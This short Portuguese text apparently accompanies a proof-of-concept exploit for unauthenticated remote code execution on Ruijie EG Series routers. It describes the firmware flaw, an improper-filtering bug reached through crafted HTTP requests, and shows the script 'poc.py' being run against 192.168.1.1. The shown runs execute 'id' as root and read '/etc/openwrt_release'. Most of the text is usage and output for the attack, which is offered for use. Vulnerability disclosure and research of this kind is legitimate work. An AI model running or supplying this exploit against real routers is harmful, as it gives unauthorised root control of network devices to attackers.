
Exploit de prova de conceito para execução remota de código não autenticada em roteadores Ruijie EG Series (firmware <=EG_3.0(1)B11P216). Executa comandos arbitrários via solicitações HTTP elaboradas.
O firmware dos roteadores Ruijie EG Series <=EG_3.0(1)B11P216 permite que atacantes não autenticados executem código arbitrário remotamente devido à filtragem incorreta.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'